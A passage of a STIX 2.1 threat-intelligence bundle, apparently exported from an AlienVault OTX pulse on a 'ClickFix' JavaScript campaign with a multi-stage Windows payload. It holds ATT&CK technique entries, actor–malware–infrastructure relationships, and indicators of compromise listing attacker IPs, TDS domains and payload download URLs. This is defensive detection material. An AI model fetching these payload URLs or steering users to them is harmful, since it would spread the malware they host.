      "id": "attack-pattern--930617e7-b93b-40b3-9f41-5b91a1756916",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1104 \u2014 Multi-Stage Channels",
      "description": "TDS fallback chain (ntdnewtds.shop \u2192 dnsnewtds.shop + third) via /jsrepo?rnd= endpoint.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1104",
          "external_id": "T1104"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c08a9c70-8acd-4f92-9df6-7ff94c92f78c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1608.002 \u2014 Stage Capabilities: Upload Tool",
      "description": "Remote second-stage JS payload hosted at TDS /jsrepo endpoint.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1608/002",
          "external_id": "T1608.002"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3382650e-6541-4a12-84a7-51eec676dd93",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ce313ffe-8117-47c9-a448-5044c480ab17",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "malware--3f399c83-6acb-45da-b156-cfb1720fa906",
      "description": "CF RUM script bundled as legitimacy cover"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7f0d619c-2eb4-481c-b7b0-ab3eb297f84e",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "infrastructure--b2dfe587-9e56-4725-8a91-1016bacf5d61"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0a302975-2cbe-4422-af79-7f743f14e35d",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "infrastructure--ed963832-b888-4739-bea7-9a78eb5364e8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1ac09a93-904a-4b03-8717-40f109b89805",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "infrastructure--4981b3b3-d2e2-4d1c-a4a2-8e691dfe2be9",
      "description": "the4ssst.ca compromised as malware host"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e7be473c-842b-4ba1-b78a-572c9b5fa2ef",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
      "target_ref": "infrastructure--b2dfe587-9e56-4725-8a91-1016bacf5d61"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cad100a8-09f3-4ce6-b8b0-d1c083dc160f",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
      "target_ref": "infrastructure--ed963832-b888-4739-bea7-9a78eb5364e8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--88d0a149-46f8-4b10-8186-378cac4bc920",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "hosted-on",
      "source_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
      "target_ref": "infrastructure--4981b3b3-d2e2-4d1c-a4a2-8e691dfe2be9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9bcb8b92-41a3-4049-8e1b-e469cb2e9086",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "hosted-on",
      "source_ref": "malware--3f399c83-6acb-45da-b156-cfb1720fa906",
      "target_ref": "infrastructure--4981b3b3-d2e2-4d1c-a4a2-8e691dfe2be9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0646549b-309b-4a41-bb3b-317d41e36f64",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--48805e62-ccb9-4904-accf-24ff35396e71",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c36f7ea3-ff2d-4cf2-82e5-b2daa06d201d",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--e14416aa-6d76-4d6c-a891-766c882e8dc9",
      "target_ref": "malware--3f399c83-6acb-45da-b156-cfb1720fa906"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--88acba85-0cb8-497b-8935-13ee40866249",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--8cfcf337-0d4c-4f96-ba49-67a7255c1294",
      "target_ref": "infrastructure--b2dfe587-9e56-4725-8a91-1016bacf5d61"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--28bd48c7-03c7-44cb-b228-bed295b79d30",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--161124c4-d98f-42d0-87db-b16857807b07",
      "target_ref": "infrastructure--ed963832-b888-4739-bea7-9a78eb5364e8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--892f7e88-960a-4f67-96ec-99e4cc3e3d5c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--a4c64c4e-f824-49c4-920c-29a642e7456b",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64ad6ba9-c72b-4e9a-9f86-5e43150a465c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--f2efd379-27b0-493f-a58e-3587e75ee694",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7d460bb9-8b8c-4a42-a8af-f6bbeee8aba2",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--f9918948-fad5-4b36-8466-d1a7002c5a63",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--278660f1-456e-45cd-a180-967835e164ca",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--8ff91c87-e1b7-49fe-823f-c9b6108cd46f",
      "target_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b9b9c6f4-40ce-49b0-8a30-44bede321c6e",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--9c21e0c6-4300-4fa0-85cf-617f887f4608"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b5e27903-d8e4-4684-a4f6-3e47d42e75b2",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--09d6b4b8-1ab2-4514-bf39-c2c69277b243"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b2a8ab01-10d1-4322-850a-0e6177314f2b",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--d052c8f6-7ff8-4887-beda-6034b4981333"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--30a6d4d6-59c9-4d77-a77c-d99511eb4499",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--918c612f-57dd-4882-ae11-7c96eaf3a6fd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee56737f-461e-47ae-9466-371bd0e67b19",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--1ed9c8ee-4be8-4196-ba0e-65b49da81a14"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--97fe1a23-99dd-4d05-bfff-f8d5238c06a7",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--e8bd5fe3-e15f-4b32-9620-058938616094"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a6338304-56cc-4490-8ab7-0752024c900c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--21da9b60-9393-47fa-9163-d82e14bf4439"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f81764c-8f2f-4b7f-8341-f896f95382ee",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--e88d64db-0290-4273-82a2-2a7071da66b5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f52a311d-0f93-4ef5-9060-bc4a9906b107",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--6474ec87-07d3-4b3b-ae22-79939ff853c0"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--202d585e-a4a4-4be3-b498-775fd19b6e09",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--abc48e17-1429-421a-943d-bc93b63c8a15"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--012916d0-5240-4f5a-88fd-a31ca1f2ee65",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--b7c4341a-1acb-4a18-a15a-2708ed6c9cc6"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ced4d36-bfe3-499f-9ee2-6d69de076684",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--930617e7-b93b-40b3-9f41-5b91a1756916"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38ff43a4-555d-46d5-837b-71e4c3c11436",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--c08a9c70-8acd-4f92-9df6-7ff94c92f78c"
    },
    {
      "contact_information": "https://otx.alienvault.com/",
      "created": "2026-05-13T05:02:56.872Z",
      "id": "identity--ab072f15-9b87-4ee1-898f-b584d41f29b0",
      "identity_class": "organization",
      "modified": "2026-05-13T05:02:56.872Z",
      "name": "Open Threat Exchange",
      "spec_version": "2.1",
      "type": "identity"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": " / CC=GB ASN=AS786 jisc services limited",
      "id": "indicator--7a6e762c-ff00-49fb-a0a1-96bed10f5aeb",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '158.94.208.104']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z",
      "valid_until": "2026-06-17T18:00:00.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": " / CC=GB ASN=AS786 jisc services limited",
      "id": "indicator--baa6c03b-2691-4b4e-a50d-58043e899dc2",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '158.94.208.92']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z",
      "valid_until": "2026-06-12T04:00:00.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": " / CC=DE ASN=AS40999 dus.net gmbh",
      "id": "indicator--9f4acaf5-9693-4c51-8119-d47baf0b6c32",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '178.16.52.232']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z",
      "valid_until": "2026-06-12T04:00:00.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--64cc5109-3562-45d1-9ae6-269039741ad5",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.92']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--d9281b63-9ba7-4b95-b5df-ffa71b7a1e1a",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://ntdnewtds.shop/jsrepo?rnd=']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--e6e0adc8-5b21-43a2-aa06-44350e3f386f",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--cd1d795d-6461-42a4-9802-4c5607715627",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'gettrumpmemestrendingtokens.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--58d34e92-e413-49b9-8eff-08a46e19d29a",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--efe5baa8-f3a7-420b-8d5a-b1182040edc6",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.dnsnewtds.shop/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--351160e9-d1b4-4889-9a4c-6ef23c6c5f16",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://dnsnewtds.shop/...']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--3e8a2307-6039-46d8-8968-7b6f52d4b1af",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.dnsnewtds.shop/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--a28f857a-19f2-4e91-9c1b-d46ec22c2c29",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'caravan-crm-lu.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--6095338f-01c5-4869-9d7f-628d3b00c1c3",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'blksssd.ydns.eu']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--6335212e-8524-4651-a211-68f17c971c20",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'kamisisterbrofanydodf.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--b504534a-e6f1-42ba-baea-1d23eb8a8eb8",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--ef4afaf6-6c4a-42f5-9fc4-384928a06ec1",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--f701673e-8308-4c25-92e6-ec556ab22767",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--397eef52-ba80-4efc-bf14-d60b925d83ea",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/my_s.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--f9fef7c7-6cb1-41ae-9421-b0e11a12b9e0",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/student_downloader.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--76dbc9f2-f941-487a-813c-dda23d440357",
      "labels": [
        "phishing"
      ],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "C2 Server / OMEGATECH / Secondary payload",
      "id": "indicator--8b5c28ad-7556-4990-a294-dbd4e583979b",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--2fa2a651-65cd-42b6-82e2-8fe0560b876f",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'gettrumpmemes.gettrumpmemestrendingtokens.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--6a90598d-2eda-4a45-9928-de4a0127b7c4",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--69bfbeee-1862-487b-b087-b43d894b46ad",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/*']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--5acb27f9-c34f-459f-826e-01a781650cc6",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/1389676a4641ef8e3b4790cf06063249d411a692.svg']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--27191f7f-d686-4a58-937d-0ab4f6b2d868",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/39676ea0b0640b4db29d0f93845d702b3784985a.svg']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--0e369376-c933-401f-bda3-2d52c6bc17a9",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/750146d79df2f7e02b6895527d982b4de952ab94.svg']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--66de35a6-54d0-4ce4-a783-cd304e6c1071",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/ca03486f14ec38cd5ed6377fe6f56c1a5713a44a.svg']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--6799e6b4-56a0-4204-874d-0220b0e85773",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://ntdnewtds.shop/jsrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--df8a5160-95f2-40ee-968a-fb77d3f4e262",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://ntdnewtds.shop/jsrepo/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
